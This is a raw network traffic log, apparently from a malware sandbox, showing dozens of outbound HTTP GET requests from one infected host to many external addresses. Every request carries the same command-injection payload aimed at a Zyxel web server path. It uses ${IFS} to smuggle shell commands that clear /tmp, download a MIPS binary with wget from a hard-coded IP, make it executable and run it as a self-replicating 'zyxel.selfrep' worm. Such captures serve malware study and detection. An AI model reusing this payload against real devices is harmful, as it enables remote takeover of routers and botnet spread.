                                      Jan 14, 2024 15:50:56.525455952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6850192.168.2.1439692144.47.145.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525490999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6851192.168.2.144720861.190.40.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525530100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6852192.168.2.1441800131.162.37.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525557995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6853192.168.2.145947441.218.221.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525587082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6854192.168.2.1459576210.165.112.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525626898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6855192.168.2.1451886223.155.46.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525686026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6856192.168.2.1447144186.138.4.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525728941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6857192.168.2.1452044162.82.69.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525763988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6858192.168.2.1453248209.126.106.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525794029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6859192.168.2.1443112193.66.147.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525849104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6860192.168.2.1453646115.17.241.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525890112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6861192.168.2.145049845.241.252.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525919914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6862192.168.2.1444688122.246.79.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525962114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6863192.168.2.1454756211.141.97.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526015997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6864192.168.2.1438266157.192.169.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526062965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6865192.168.2.1437980188.41.142.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526087999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6866192.168.2.144291492.130.142.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526125908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6867192.168.2.1448172164.55.54.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526185989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6868192.168.2.1440130117.62.154.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526215076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6869192.168.2.1460922172.198.235.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526241064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6870192.168.2.143730023.75.160.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526284933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6871192.168.2.144934299.83.173.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526324034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6872192.168.2.1454482130.134.174.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526360989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6873192.168.2.144710487.124.15.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526401997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6874192.168.2.143771617.123.170.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526439905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6875192.168.2.144071269.62.113.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526468039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6876192.168.2.143376420.21.94.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526498079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6877192.168.2.1458942185.4.63.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526570082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6878192.168.2.145210085.15.33.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526582003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6879192.168.2.144323853.144.39.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526628971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6880192.168.2.144611640.81.35.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526686907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6881192.168.2.1453024195.40.12.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526726007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6882192.168.2.1457244103.28.93.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526767969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6883192.168.2.1438562186.232.67.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526796103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6884192.168.2.1439688173.213.163.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526819944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6885192.168.2.1443706184.24.108.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526875019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6886192.168.2.1455192195.161.76.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526911020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6887192.168.2.1443440111.214.248.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526937008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6888192.168.2.144832862.153.63.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.526988029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6889192.168.2.1459246221.29.215.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527026892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6890192.168.2.1434668210.138.231.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527070045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6891192.168.2.1442302191.41.239.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527103901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6892192.168.2.1458332161.140.93.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527141094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6893192.168.2.1443976178.250.43.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527160883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6894192.168.2.1434002113.11.206.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527215958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6895192.168.2.145555645.103.106.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527251959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6896192.168.2.145766062.33.212.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527278900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6897192.168.2.144635881.128.251.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527311087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6898192.168.2.14593668.6.47.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527362108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6899192.168.2.1459628189.121.169.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527401924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6900192.168.2.1441518186.139.249.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527456999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6901192.168.2.14394882.239.115.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527498960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6902192.168.2.1453086204.134.135.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527532101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6903192.168.2.1458742104.182.183.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527559996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6904192.168.2.145593054.17.61.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527585030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6905192.168.2.145228414.158.22.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527631998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6906192.168.2.1439170147.63.11.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527678013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6907192.168.2.145949882.194.77.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527694941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6908192.168.2.143448447.124.24.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527738094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6909192.168.2.1458460185.104.144.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527772903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6910192.168.2.145124037.157.130.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527801037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6911192.168.2.1445548188.165.231.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527843952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6912192.168.2.144887844.119.25.25443
                                      TimestampBytes transferredDirectionData
